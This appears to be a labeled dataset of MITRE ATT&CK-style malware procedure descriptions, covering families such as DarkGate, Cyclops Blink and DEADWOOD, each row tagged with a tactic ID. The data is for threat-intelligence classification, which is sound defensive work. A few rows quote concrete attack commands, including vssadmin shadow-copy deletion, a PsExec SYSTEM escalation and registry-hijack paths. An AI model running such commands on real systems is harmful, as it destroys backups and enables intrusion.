"Cuckoo Stealer can check the systems `LANG` environmental variable to prevent infecting devices from Armenia , Belarus , Kazakhstan , Russia , and Ukraine .",['TA0007:Discovery']
Cuckoo Stealer can determine the geographical location of a victim host by checking the language.,['TA0007:Discovery']
Cuckoo Stealer can discover and send the username from a compromised host to C2.,['TA0007:Discovery']
Cuckoo Stealer can spawn a bash shell to enable execution on compromised hosts.,['TA0002:Execution']
Cuckoo Stealer can use the curl API for C2 communications.,['TA0011:Command and Control']
"Cyclops Blink can encrypt C2 messages with AES-256-CBC sent underneath TLS. OpenSSL library functions are also used to encrypt each message using a randomly generated key and IV, which are then encrypted using a hard-coded RSA public key.",['TA0011:Command and Control']
"Cyclops Blink has maintained persistence by patching legitimate device firmware when it is downloaded, including that of WatchGuard devices.","['TA0005:Defense Evasion', 'TA0003:Persistence']"
Cyclops Blink can upload files from a compromised host.,['TA0009:Collection']
Cyclops Blink can decrypt and parse instructions sent from C2.,['TA0005:Defense Evasion']
Cyclops Blink can modify the Linux iptables firewall to enable C2 communication on network devices via a stored list of port numbers.,['TA0005:Defense Evasion']
Cyclops Blink has the ability to upload exfiltrated files to a C2 server.,['TA0010:Exfiltration']
Cyclops Blink can use the Linux API `statvfs` to enumerate the current working directory.,['TA0007:Discovery']
Cyclops Blink has the ability to download files to target systems.,['TA0011:Command and Control']
Cyclops Blink has the ability to create a pipe to enable inter-process communication.,['TA0002:Execution']
Cyclops Blink can rename its running process to kworker:0/1 to masquerade as a Linux kernel thread. Cyclops Blink has also named RC scripts used for persistence after WatchGuard artifacts.,['TA0005:Defense Evasion']
Cyclops Blink has used Tor nodes for C2 traffic.,['TA0011:Command and Control']
Cyclops Blink can use various Linux API functions including those for execution and discovery.,['TA0002:Execution']
Cyclops Blink can use a custom binary scheme to encode messages with specific commands and parameters to be executed.,['TA0011:Command and Control']
Cyclops Blink can use non-standard ports for C2 not typically associated with HTTP or HTTPS traffic.,['TA0011:Command and Control']
Cyclops Blink can enumerate the process it is currently running under.,['TA0007:Discovery']
Cyclops Blink can use DNS over HTTPS to resolve C2 nodes.,['TA0011:Command and Control']
"Cyclops Blink has the ability to execute on device startup, using a modified RC script named S51armled.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cyclops Blink has the ability to query device information.,['TA0007:Discovery']
Cyclops Blink can use the Linux API `if_nameindex` to gather network interface names.,['TA0007:Discovery']
Cyclops Blink has the ability to use the Linux API function `utime` to change the timestamps of modified firmware update images.,['TA0005:Defense Evasion']
Cyclops Blink can download files via HTTP and HTTPS.,['TA0011:Command and Control']
DCSrv has encrypted drives using the core encryption mechanism from DiskCryptor.,['TA0040:Impact']
DCSrv's configuration is encrypted.,['TA0005:Defense Evasion']
DCSrv has masqueraded its service as a legitimate svchost.exe process.,['TA0005:Defense Evasion']
DCSrv has created Registry keys for persistence.,['TA0005:Defense Evasion']
"DCSrv has used various Windows API functions, including `DeviceIoControl`, as part of its encryption process.",['TA0002:Execution']
DCSrv has a function to sleep for two hours before rebooting the system.,['TA0040:Impact']
DCSrv can compare the current time on an infected host with a configuration value to determine when to start the encryption process.,['TA0007:Discovery']
DCSrv has created new services for persistence by modifying the Registry.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
DDKONG decodes an embedded configuration using XOR.,['TA0005:Defense Evasion']
DDKONG lists files on the victim’s machine.,['TA0007:Discovery']
DDKONG downloads and uploads files on the victim’s machine.,['TA0011:Command and Control']
DDKONG uses Rundll32 to ensure only a single instance of itself is running at once.,['TA0005:Defense Evasion']
DEADEYE has the ability to combine multiple sections of a binary which were broken up to evade detection into a single .dll prior to execution.,['TA0005:Defense Evasion']
The DEADEYE.EMBED variant of DEADEYE has the ability to embed payloads inside of a compiled binary.,['TA0005:Defense Evasion']
DEADEYE has encrypted its payload.,['TA0005:Defense Evasion']
"DEADEYE can ensure it executes only on intended systems by identifying the victim's volume serial number, hostname, and/or DNS domain.",['TA0005:Defense Evasion']
"DEADEYE has used `schtasks /change` to modify scheduled tasks including `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility, \Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`.",['TA0005:Defense Evasion']
DEADEYE can use `msiexec.exe` for execution of malicious DLL.,['TA0005:Defense Evasion']
The DEADEYE.EMBED variant of DEADEYE can embed its payload in an alternate data stream of a local file.,['TA0005:Defense Evasion']
DEADEYE can execute the `GetComputerNameA` and `GetComputerNameExA` WinAPI functions.,['TA0002:Execution']
DEADEYE can use `rundll32.exe` for execution of living off the land binaries such as `SHELL32.DLL`.,['TA0005:Defense Evasion']
"DEADEYE has used the scheduled tasks `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility`, `\Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared` to establish persistence.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
DEADEYE can enumerate a victim computer's volume serial number and host name.,['TA0007:Discovery']
DEADEYE can discover the DNS domain name of a targeted system.,['TA0007:Discovery']
DEADEYE can run `cmd /c copy /y /b C:\Users\public\syslog_6-*.dat C:\Users\public\syslog.dll` to combine separated sections of code into a single DLL prior to execution.,['TA0002:Execution']
"DEADWOOD changes the password for local and domain users via net.exe to a random 32 character string to prevent these accounts from logging on. Additionally, DEADWOOD will terminate the winlogon.exe process to prevent attempts to log on to the infected system.",['TA0040:Impact']
DEADWOOD overwrites files on victim systems with random data to effectively destroy them.,['TA0040:Impact']
"DEADWOOD XORs some strings within the binary using the value 0xD5, and deobfuscates these items at runtime.",['TA0005:Defense Evasion']
DEADWOOD deletes files following overwriting them with random data.,['TA0040:Impact']
"DEADWOOD opens and writes zeroes to the first 512 bytes of each drive, deleting the MBR. DEADWOOD then sends the control code IOCTL_DISK_DELETE_DRIVE_LAYOUT to ensure the MBR is removed from the drive.",['TA0040:Impact']
"DEADWOOD contains an embedded, AES-encrypted payload labeled METADATA that provides configuration information for follow-on execution.",['TA0005:Defense Evasion']
"DEADWOOD contains an embedded, AES-encrypted resource named METADATA that contains configuration information for follow-on execution.",['TA0005:Defense Evasion']
DEADWOOD will attempt to masquerade its service execution using benign-looking names such as ScDeviceEnums.,['TA0005:Defense Evasion']
"DEADWOOD can be executed as a service using various names, such as ScDeviceEnums.",['TA0002:Execution']
"DEADWOOD will set a timestamp value to determine when wiping functionality starts. When the timestamp is met on the system, a trigger file is created on the operating system allowing for execution to proceed. If the timestamp is in the past, the wiper will execute immediately.",['TA0007:Discovery']
DEATHRANSOM can use public and private key pair encryption to encrypt files for ransom payment.,['TA0040:Impact']
DEATHRANSOM can use loop operations to enumerate directories on a compromised host.,['TA0007:Discovery']
DEATHRANSOM can download files to a compromised host.,['TA0011:Command and Control']
DEATHRANSOM can delete volume shadow copies on compromised hosts.,['TA0040:Impact']
DEATHRANSOM has the ability to use loop operations to enumerate network resources.,['TA0007:Discovery']
DEATHRANSOM can enumerate logical drives on a target system.,['TA0007:Discovery']
"Some versions of DEATHRANSOM have performed language ID and keyboard layout checks; if either of these matched Russian, Kazakh, Belarusian, Ukrainian or Tatar DEATHRANSOM would exit.",['TA0007:Discovery']
DEATHRANSOM can use HTTPS to download files.,['TA0011:Command and Control']
DEATHRANSOM has the ability to use WMI to delete volume shadow copies.,['TA0002:Execution']
DOGCALL can capture microphone data from the victim's machine.,['TA0009:Collection']
"DOGCALL is capable of leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex for C2.",['TA0011:Command and Control']
DOGCALL is encrypted using single-byte XOR.,['TA0005:Defense Evasion']
DOGCALL can download and execute additional payloads.,['TA0011:Command and Control']
DOGCALL is capable of logging keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
DOGCALL is capable of capturing screenshots of the victim's machine.,['TA0009:Collection']
DRATzarus can collect information from a compromised host.,['TA0009:Collection']
DRATzarus can use `IsDebuggerPresent` to detect whether a debugger is present on a victim.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
DRATzarus can deploy additional tools onto an infected machine.,['TA0011:Command and Control']
"DRATzarus has been named `Flash.exe`, and its dropper has been named `IExplorer`.",['TA0005:Defense Evasion']
DRATzarus can use various API calls to see if it is running in a sandbox.,['TA0002:Execution']
DRATzarus can be partly encrypted with XOR.,['TA0005:Defense Evasion']
DRATzarus can enumerate and examine running processes to determine if a debugger is present.,['TA0007:Discovery']
DRATzarus can search for other machines connected to compromised host and attempt to map the network.,['TA0007:Discovery']
DRATzarus's dropper can be packed with UPX.,['TA0005:Defense Evasion']
DRATzarus can obtain a list of users from an infected machine.,['TA0007:Discovery']
DRATzarus can use the `GetTickCount` and `GetSystemTimeAsFileTime` API calls to inspect system time.,['TA0007:Discovery']
DRATzarus can use the `GetTickCount` and `GetSystemTimeAsFileTime` API calls to measure function timing. DRATzarus can also remotely shut down into sleep mode under specific conditions to evade detection.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
DRATzarus can use HTTP or HTTPS for C2 communications.,['TA0011:Command and Control']
DUSTPAN decodes and decrypts embedded payloads.,['TA0005:Defense Evasion']
DUSTPAN decrypts and executes an embedded payload.,['TA0005:Defense Evasion']
DUSTPAN decrypts an embedded payload.,['TA0005:Defense Evasion']
DUSTPAN is often disguised as a legitimate Windows binary such as `w3wp.exe` or `conn.exe`.,['TA0005:Defense Evasion']
DUSTPAN can inject its decrypted payload into another process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
DUSTPAN can persist as a Windows Service in operations.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
DUSTTRAP can enumerate running application windows.,['TA0007:Discovery']
DUSTTRAP can delete infected system log information.,['TA0005:Defense Evasion']
DUSTTRAP can gather data from infected systems.,['TA0009:Collection']
DUSTTRAP deobfuscates embedded payloads.,['TA0005:Defense Evasion']
DUSTTRAP can enumerate domain accounts.,['TA0007:Discovery']
DUSTTRAP can identify Active Directory information and related items.,['TA0007:Discovery']
DUSTTRAP contains additional embedded DLLs and configuration files that are loaded into memory during execution.,['TA0005:Defense Evasion']
DUSTTRAP begins with an initial launcher that decrypts an AES-128-CFB encrypted file on disk and executes it in memory.,['TA0005:Defense Evasion']
DUSTTRAP can exfiltrate collected data over C2 channels.,['TA0010:Exfiltration']
DUSTTRAP can enumerate files and directories.,['TA0007:Discovery']
DUSTTRAP can identify victim environment Group Policy information.,['TA0007:Discovery']
DUSTTRAP restores the `.text` section of compromised DLLs after malicious code is loaded into memory and before the file is closed.,['TA0005:Defense Evasion']
DUSTTRAP can retrieve and load additional payloads.,['TA0011:Command and Control']
DUSTTRAP can perform keylogging operations.,"['TA0009:Collection', 'TA0006:Credential Access']"
DUSTTRAP can enumerate local user accounts.,['TA0007:Discovery']
DUSTTRAP can identify infected system log information.,['TA0007:Discovery']
DUSTTRAP can remove network shares from infected systems.,['TA0005:Defense Evasion']
DUSTTRAP can identify and enumerate victim system network shares.,['TA0007:Discovery']
DUSTTRAP can enumerate running processes.,['TA0007:Discovery']
DUSTTRAP compromises the `.text` section of a legitimate system DLL in `%windir%` to hold the contents of retrieved plug-ins.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
DUSTTRAP can enumerate Registry items.,['TA0007:Discovery']
DUSTTRAP can use `ping` to identify remote hosts within the victim network.,['TA0007:Discovery']
DUSTTRAP can capture screenshots.,['TA0009:Collection']
DUSTTRAP can identify security software.,['TA0007:Discovery']
DUSTTRAP decryption relies on the infected machine's `HKLM\SOFTWARE\Microsoft\Cryptography\MachineGUID` value.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
DUSTTRAP reads the value of the infected system's `HKLM\SYSTEM\Microsoft\Cryptography\MachineGUID` value.,['TA0007:Discovery']
DUSTTRAP can enumerate infected system network information.,['TA0007:Discovery']
DUSTTRAP reads the infected system's current time and writes it to a log file during execution.,['TA0007:Discovery']
DUSTTRAP can execute commands via `cmd.exe`.,['TA0002:Execution']
Dacls can encrypt its configuration file with AES CBC.,['TA0005:Defense Evasion']
Dacls can scan directories on a compromised host.,['TA0007:Discovery']
Dacls has had its payload named with a dot prefix to make it hidden from view in the Finder application.,['TA0005:Defense Evasion']
Dacls can download its payload from a C2 server.,['TA0011:Command and Control']
Dacls can establish persistence via a LaunchAgent.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Dacls can establish persistence via a Launch Daemon.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
The Dacls Mach-O binary has been disguised as a .nib file.,['TA0005:Defense Evasion']
Dacls can collect data on running and parent processes.,['TA0007:Discovery']
Dacls can use HTTPS in C2 communications.,['TA0011:Command and Control']
DanBot can use use IPv4 A records and IPv6 AAAA DNS records in C2 communications.,['TA0011:Command and Control']
DanBot can upload files from compromised hosts.,['TA0009:Collection']
DanBot can use a VBA macro to decode its payload prior to installation and execution.,['TA0005:Defense Evasion']
DanBot can Base64 encode its payload.,['TA0005:Defense Evasion']
DanBot can delete its configuration file after installation.,['TA0005:Defense Evasion']
DanBot can download additional files to a targeted system.,['TA0011:Command and Control']
DanBot has relied on victims' opening a malicious file for initial execution.,['TA0002:Execution']
DanBot files have been named `UltraVNC.exe` and `WINVNC.exe` to appear as legitimate VNC tools.,['TA0005:Defense Evasion']
DanBot can use a scheduled task for installation.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
DanBot has been distributed within a malicious Excel attachment via spearphishing emails.,['TA0001:Initial Access']
DanBot can use VNC for remote access to targeted systems.,['TA0008:Lateral Movement']
DanBot can use a VBA macro embedded in an Excel file to drop the payload.,['TA0002:Execution']
DanBot can use HTTP in C2 communication.,['TA0011:Command and Control']
DanBot has the ability to execute arbitrary commands via `cmd.exe`.,['TA0002:Execution']
DarkComet can listen in to victims' conversations through the system’s microphone.,['TA0009:Collection']
DarkComet can steal data from the clipboard.,['TA0009:Collection']
DarkComet can execute various types of scripts on the victim’s machine.,['TA0002:Execution']
DarkComet can disable Security Center functions like the Windows Firewall.,['TA0005:Defense Evasion']
DarkComet can disable Security Center functions like anti-virus.,['TA0005:Defense Evasion']
DarkComet can load any files onto the infected machine to execute.,['TA0011:Command and Control']
DarkComet has a keylogging capability.,"['TA0009:Collection', 'TA0006:Credential Access']"
DarkComet has dropped itself onto victim machines with file names such as WinDefender.Exe and winupdate.exe in an apparent attempt to masquerade as a legitimate file.,['TA0005:Defense Evasion']
DarkComet adds a Registry value for its installation routine to the Registry Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System Enable LUA=”0” and HKEY_CURRENT_USER\Software\DC3_FEXEC.,['TA0005:Defense Evasion']
DarkComet can list active processes running on the victim’s machine.,['TA0007:Discovery']
DarkComet adds several Registry entries to enable automatic execution at every system startup.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
DarkComet can open an active screen of the victim’s machine and take control of the mouse and keyboard.,['TA0008:Lateral Movement']
DarkComet has the option to compress its payload using UPX or MPRESS.,['TA0005:Defense Evasion']
"DarkComet can collect the computer name, RAM used, and operating system version from the victim’s machine.",['TA0007:Discovery']
DarkComet gathers the username from the victim’s machine.,['TA0007:Discovery']
DarkComet can access the victim’s webcam to take pictures.,['TA0009:Collection']
DarkComet can use HTTP for C2 communications.,['TA0011:Command and Control']
DarkComet can launch a remote shell to execute commands on the victim’s machine.,['TA0002:Execution']
DarkGate elevates accounts created through the malware to the local administration group during execution.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
DarkGate will search for cryptocurrency wallets by examining application window names for specific strings. DarkGate extracts information collected via NirSoft tools from the hosting process's memory by first identifying the window through the FindWindow API function.,['TA0007:Discovery']
"DarkGate uses AutoIt scripts dropped to a hidden directory during initial installation phases, such as `test.au3`.",['TA0002:Execution']
DarkGate searches for stored credentials associated with cryptocurrency wallets and notifies the command and control server when identified.,['TA0009:Collection']
DarkGate uses two distinct User Account Control bypass techniques to escalate privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
DarkGate starts a thread on execution that captures clipboard data and logs it to a predefined log file.,['TA0009:Collection']
DarkGate can deploy follow-on cryptocurrency mining payloads.,['TA0040:Impact']
DarkGate use Nirsoft Network Password Recovery or NetPass tools to steal stored RDP credentials in some malware versions.,['TA0006:Credential Access']
"DarkGate includes one infection vector that leverages a malicious ""KeyScramblerE.DLL"" library that will load during the execution of the legitimate KeyScrambler application.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
DarkGate can cloak command and control traffic in DNS records from legitimate services to avoid reputation-based detection techniques.,['TA0011:Command and Control']
DarkGate can deploy follow-on ransomware payloads.,['TA0040:Impact']
DarkGate will retrieved encrypted commands from its command and control server for follow-on actions such as cryptocurrency mining.,['TA0011:Command and Control']
DarkGate checks the BeingDebugged flag in the PEB structure during execution to identify if the malware is being debugged.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
"DarkGate installation includes binary code stored in a file located in a hidden directory, such as shell.txt, that is decrypted then executed. DarkGate uses hexadecimal-encoded shellcode payloads during installation that are called via Windows API CallWindowProc to decode and then execute.",['TA0005:Defense Evasion']
DarkGate will terminate processes associated with several security software products if identified during execution.,['TA0005:Defense Evasion']
DarkGate command and control includes hard-coded domains in the malware chosen to masquerade as legitimate services such as Akamai CDN or Amazon Web Services.,['TA0042:Resource Development']
DarkGate masquerades malicious LNK files as PDF objects using the double extension .pdf.lnk.,['TA0005:Defense Evasion']
"DarkGate drops an encrypted PE file, pe.bin, and decrypts it during installation. DarkGate also uses custom base64 encoding schemas in later variations to obfuscate payloads.",['TA0005:Defense Evasion']
"DarkGate uses per-victim links for hosting malicious archives, such as ZIP files, in services such as SharePoint to prevent other entities from retrieving them.",['TA0005:Defense Evasion']
DarkGate uses existing command and control channels to retrieve captured cryptocurrency wallet credentials.,['TA0010:Exfiltration']
Some versions of DarkGate search for the hard-coded folder C:\Program Files\e Carte Bleue.,['TA0007:Discovery']
DarkGate can deploy payloads capable of capturing credentials related to cryptocurrency wallets.,['TA0040:Impact']
DarkGate initial installation involves dropping several files to a hidden directory named after the victim machine name.,['TA0005:Defense Evasion']
DarkGate command and control includes hard-coded domains in the malware masquerading as legitimate services such as Akamai CDN or Amazon Web Services.,['TA0011:Command and Control']
"DarkGate edits the Registry key HKCU\Software\Classes\mscfile\shell\open\command to execute a malicious AutoIt script. When eventvwr.exe is executed, this will call the Microsoft Management Console , which in turn references the modified Registry key.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
DarkGate retrieves cryptocurrency mining payloads and commands in encrypted traffic from its command and control server. DarkGate uses Windows Batch scripts executing the curl command to retrieve follow-on payloads.,['TA0011:Command and Control']
DarkGate can delete system restore points through the command cmd.exe /c vssadmin delete shadows /for=c: /all /quiet”.,['TA0040:Impact']
DarkGate will spawn a thread on execution to capture all keyboard events and write them to a predefined log file.,"['TA0009:Collection', 'TA0006:Credential Access']"
"DarkGate creates a local user account, SafeMode, via net user commands.",['TA0003:Persistence']
DarkGate initial infection payloads can masquerade as pirated media content requiring user interaction for code execution. DarkGate is distributed through phishing links to VBS or MSI objects requiring user interaction for execution.,['TA0002:Execution']
DarkGate can masquerade as pirated media content for initial delivery to victims.,['TA0005:Defense Evasion']
DarkGate uses the native Windows API CallWindowProc to decode and launch encoded shellcode payloads during execution. DarkGate can call kernel mode functions directly to hide the use of process hollowing methods during execution.,['TA0002:Execution']
"DarkGate uses a hard-coded string as a seed, along with the victim machine hardware identifier and input text, to generate a unique string used as an internal mutex value to evade static detection based on mutexes.",['TA0005:Defense Evasion']
"DarkGate relies on parent PID spoofing as part of its ""rootkit-like"" functionality to evade detection via Task Manager or Process Explorer.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"DarkGate overrides the %windir% environment variable by setting a Registry key, HKEY_CURRENT_User\Environment\windir, to an alternate command to execute a malicious AutoIt script. This allows DarkGate to run every time the scheduled task DiskCleanup is executed as this uses the path value %windir%\system32\cleanmgr.exe for execution.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"DarkGate performs various checks for running processes, including security software by looking for hard-coded process name values.",['TA0007:Discovery']
"DarkGate leverages process hollowing techniques to evade detection, such as decrypting the content of an encrypted PE file and injecting it into the process vbc.exe.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"DarkGate installation includes AutoIt script execution creating a shortcut to itself as an LNK object, such as bill.lnk, in the victim startup folder. DarkGate installation finishes with the creation of a registry Run key.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
DarkGate executes a Windows Batch script during installation that creases a randomly-named directory in the C:\\ root directory that copies and renames the legitimate Windows curl command to this new location.,['TA0005:Defense Evasion']
"DarkGate looks for various security products by process name using hard-coded values in the malware. DarkGate will not execute its keylogging thread if a process name associated with Trend Micro anti-virus is identified, or if runtime checks identify the presence of Kaspersky anti-virus. DarkGate will initiate a new thread if certain security products are identified on the victim, and recreate any malicious files associated with it if it determines they were removed by security software in a new system location.",['TA0007:Discovery']
"DarkGate tries to elevate privileges to SYSTEM using PsExec to locally execute as a service, such as cmd /c c:\temp\PsExec.exe -accepteula -j -d -s Target Binary.",['TA0002:Execution']
DarkGate can be distributed through emails with malicious attachments from a spoofed email address.,['TA0001:Initial Access']
DarkGate is distributed in phishing emails containing links to distribute malicious VBS or MSI files. DarkGate uses applications such as Microsoft Teams for distributing links to payloads.,['TA0001:Initial Access']
DarkGate queries system resources on an infected machine to identify if it is executing in a sandbox or virtualized environment.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
"DarkGate uses the Delphi methods Sysutils::DiskSize and GlobalMemoryStatusEx to collect disk size and physical memory as part of the malware's anti-analysis checks for running in a virtualized environment. DarkGate will gather various system information such as display adapter description, operating system type and version, processor type, and RAM amount.",['TA0007:Discovery']
DarkGate queries system locale information during execution. Later versions of DarkGate query GetSystemDefaultLCID for locale information to determine if the malware is executing in Russian-speaking countries.,['TA0007:Discovery']
"DarkGate creates a log file for capturing keylogging, clipboard, and related data using the victim host's current date for the filename. DarkGate queries victim system epoch time during execution. DarkGate captures system time information as part of automated profiling on initial installation.",['TA0007:Discovery']
DarkGate uses NirSoft tools to steal user credentials from the infected machine. NirSoft tools are executed via process hollowing in a newly-created instance of vbc.exe or regasm.exe.,['TA0006:Credential Access']
DarkGate initial infection mechanisms include masquerading as pirated media that launches malicious VBScript on the victim.,['TA0002:Execution']
DarkGate uses a malicious Windows Batch script to run the Windows code utility to retrieve follow-on script payloads.,['TA0002:Execution']
DarkTortilla can detect profilers by verifying the `COR_ENABLE_PROFILING` environment variable is present and active.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
DarkTortilla can download a clipboard information stealer module.,['TA0009:Collection']
DarkTortilla has used the `WshShortcut` COM object to create a .lnk shortcut file in the Windows startup folder.,['TA0002:Execution']
DarkTortilla can detect debuggers by using functions such as `DebuggerIsAttached` and `DebuggerIsLogging`. DarkTortilla can also detect profilers by verifying the `COR_ENABLE_PROFILING` environment variable is present and active.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
DarkTortilla can decrypt its payload and associated configuration elements using the Rijndael cipher.,['TA0005:Defense Evasion']
DarkTortilla can use a .NET-based DLL named `RunPe6` for process injection.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
DarkTortilla has used `%HiddenReg%` and `%HiddenKey%` as part of its persistence via the Windows registry.,['TA0005:Defense Evasion']
"DarkTortilla can download additional packages for keylogging, cryptocurrency mining, and other capabilities; it can also retrieve malicious payloads such as Agent Tesla, AsyncRat, NanoCore, RedLine, Cobalt Strike, and Metasploit.",['TA0011:Command and Control']
DarkTortilla can check for internet connectivity by issuing HTTP GET requests.,['TA0007:Discovery']
DarkTortilla can download a keylogging module.,"['TA0009:Collection', 'TA0006:Credential Access']"
DarkTortilla has relied on a user to open a malicious document or archived file delivered via email for initial execution.,['TA0002:Execution']
DarkTortilla's payload has been renamed `PowerShellInfo.exe`.,['TA0005:Defense Evasion']
DarkTortilla has modified registry keys for persistence.,['TA0005:Defense Evasion']
DarkTortilla can use a variety of API calls for persistence and defense evasion.,['TA0002:Execution']
DarkTortilla has been obfuscated with the DeepSea .NET and ConfuserEx code obfuscators.,['TA0005:Defense Evasion']
DarkTortilla can enumerate a list of running processes on a compromised system.,['TA0007:Discovery']
DarkTortilla has established persistence via the `Software\Microsoft\Windows NT\CurrentVersion\Run` registry key and by creating a .lnk shortcut file in the Windows startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
DarkTortilla can check for the Kaspersky Anti-Virus suite.,['TA0007:Discovery']
"DarkTortilla has been distributed via spearphishing emails containing archive attachments, with file types such as .iso, .zip, .img, .dmg, and .tar, as well as through malicious documents.",['TA0001:Initial Access']
"DarkTortilla can search a compromised system's running processes and services to detect Hyper-V, QEMU, Virtual PC, Virtual Box, and VMware, as well as Sandboxie.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"DarkTortilla can obtain system information by querying the `Win32_ComputerSystem`, `Win32_BIOS`, `Win32_MotherboardDevice`, `Win32_PnPEntity`, and `Win32_DiskDrive` WMI objects.",['TA0007:Discovery']
DarkTortilla can retrieve information about a compromised system's running services.,['TA0007:Discovery']
DarkTortilla can implement the `kernel32.dll` Sleep function to delay execution for up to 300 seconds before implementing persistence or processing an addon package.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
DarkTortilla has used HTTP and HTTPS for C2.,['TA0011:Command and Control']
DarkTortilla can retrieve its primary payload from public sites such as Pastebin and Textbin.,['TA0011:Command and Control']
DarkTortilla can use `cmd.exe` to add registry keys for persistence.,['TA0002:Execution']
DarkTortilla can use WMI queries to obtain system information.,['TA0002:Execution']
DarkTortilla has established persistence via the `Software\Microsoft\Windows NT\CurrentVersion\Winlogon` registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
DarkWatchman reports window names along with keylogger information to provide application context.,['TA0007:Discovery']
DarkWatchman can use TLS to encrypt its C2 channel.,['TA0011:Command and Control']
DarkWatchman can retrieve browser history.,['TA0007:Discovery']
DarkWatchman has used Base64 to encode PowerShell commands.,['TA0005:Defense Evasion']
DarkWatchman has used the csc.exe tool to compile a C# executable.,['TA0005:Defense Evasion']
DarkWatchman can collect files from a compromised host.,['TA0009:Collection']
DarkWatchman has the ability to self-extract as a RAR archive.,['TA0005:Defense Evasion']
DarkWatchman has used a DGA to generate a domain name for C2.,['TA0011:Command and Control']
DarkWatchman has been delivered as compressed RAR payloads in ZIP files to victims.,['TA0005:Defense Evasion']
DarkWatchman has been observed deleting its original launcher after installation.,['TA0005:Defense Evasion']
DarkWatchman has the ability to enumerate file and folder names.,['TA0007:Discovery']
"DarkWatchman can store configuration strings, keylogger, and output of components in the Registry.",['TA0005:Defense Evasion']
"DarkWatchman can uninstall malicious components from the Registry, stop processes, and clear the browser history.",['TA0005:Defense Evasion']
DarkWatchman can delete shadow volumes using vssadmin.exe.,['TA0040:Impact']
DarkWatchman uses JavaScript to perform its core functionalities.,['TA0002:Execution']
DarkWatchman can track key presses with a keylogger module.,"['TA0009:Collection', 'TA0006:Credential Access']"
DarkWatchman can stage local data in the Windows Registry.,['TA0009:Collection']
DarkWatchman has used an icon mimicking a text file to mask a malicious executable.,['TA0005:Defense Evasion']
"DarkWatchman can modify Registry values to store configuration strings, keylogger, and output of components.",['TA0005:Defense Evasion']
DarkWatchman can list signed PnP drivers for smartcard readers.,['TA0007:Discovery']
DarkWatchman can execute PowerShell commands and has used PowerShell to execute a keylogger.,['TA0002:Execution']
DarkWatchman can query the Registry to determine if it has already been installed on the system.,['TA0007:Discovery']
DarkWatchman has created a scheduled task for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
DarkWatchman can search for anti-virus products on the system.,['TA0007:Discovery']
DarkWatchman can load DLLs.,['TA0002:Execution']
DarkWatchman has been delivered via spearphishing emails that contain a malicious zip file.,['TA0001:Initial Access']
DarkWatchman encodes data using hexadecimal representation before sending it to the C2 server.,['TA0011:Command and Control']
"DarkWatchman can collect the OS version, system architecture, and computer name.",['TA0007:Discovery']
DarkWatchman can identity the OS locale of a compromised host.,['TA0007:Discovery']
DarkWatchman has collected the username from a victim machine.,['TA0007:Discovery']
DarkWatchman can collect time zone information and system `UPTIME`.,['TA0007:Discovery']
DarkWatchman uses HTTPS for command and control.,['TA0011:Command and Control']
DarkWatchman can use `cmd.exe` to execute commands.,['TA0002:Execution']
DarkWatchman can use WMI to execute commands.,['TA0002:Execution']
Daserf hides collected data in password-protected .rar archives.,['TA0009:Collection']
Daserf hides collected data in password-protected .rar archives.,['TA0009:Collection']
Some Daserf samples were signed with a stolen digital certificate.,['TA0005:Defense Evasion']
Analysis of Daserf has shown that it regularly undergoes technical improvements to evade anti-virus detection.,['TA0005:Defense Evasion']
Daserf can download remote files.,['TA0011:Command and Control']
Daserf can log keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
Daserf leverages Mimikatz and Windows Credential Editor to steal credentials.,['TA0006:Credential Access']
"Daserf uses file and folder names related to legitimate programs in order to blend in, such as HP, Intel, Adobe, and perflogs.",['TA0005:Defense Evasion']
Daserf uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher.,['TA0005:Defense Evasion']
Daserf can take screenshots.,['TA0009:Collection']
A version of Daserf uses the MPRESS packer.,['TA0005:Defense Evasion']
Daserf uses custom base64 encoding to obfuscate HTTP traffic.,['TA0011:Command and Control']
Daserf can use steganography to hide malicious code downloaded to the victim.,['TA0011:Command and Control']
Daserf uses RC4 encryption to obfuscate HTTP traffic.,['TA0011:Command and Control']
